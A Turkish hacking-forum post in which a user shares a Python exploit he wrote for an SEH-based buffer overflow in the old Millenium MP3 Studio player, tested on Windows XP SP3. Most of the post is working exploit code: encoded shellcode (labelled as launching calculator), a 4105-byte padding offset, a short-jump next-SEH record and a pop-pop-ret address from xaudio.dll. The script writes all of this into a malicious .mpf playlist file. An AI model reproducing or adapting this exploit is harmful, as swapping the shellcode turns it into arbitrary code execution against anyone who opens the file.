HerTürlüBilgi - WebmasterForum - CrackForum - CyberSecurity
MERHABA
Üye olmak için bugün ücretsiz bir hesap açın! Oturum açtıktan sonra, kendi konularınızı ve gönderilerinizi ekleyerek bu siteye katılabilecek ve kendi özel gelen kutunuz aracılığıyla diğer üyelerle bağlantı kurabileceksiniz!

Millenium MP3 Studio (Buffer Overflow) SEH

Tr0n

Legendary
legendary
Selam millet bu gün sizlere Millenium MP3 Studio programına yazdığım exploiti göstericem 10 yıllık program benden önce yazanlar olmuşdur elbet ama pythonla yazan yok kendim pythonda yazdım.
Python:
# Millenium MP3 Studio SEH Based Exploit
# Tested :  Windows XP SP3 X86
# Tr0n
calc = (b"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"+
b"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"+
b"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"+
b"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"+
b"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"+
b"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"+
b"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"+
b"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"+
b"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"+
b"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"+
b"\x7f\xe8\x7b\xca")

offset = 4105
padding = b"http://"
padding += b"A"*offset

nextSEH = b"\xeb\x20\x90\x90" # jmp 0x20
SEH = b"\x87\x50\x01\x10"     # pop esi, pop edi, ret - xaudio.dll

exploit = padding + nextSEH + SEH + b"\x90"*32 + calc

# File path
file = "XP/exploit.mpf"
# File Create
f = open(file, "wb")
f.write(exploit)
f.close()
Çalıştığına dair gif

 
Üst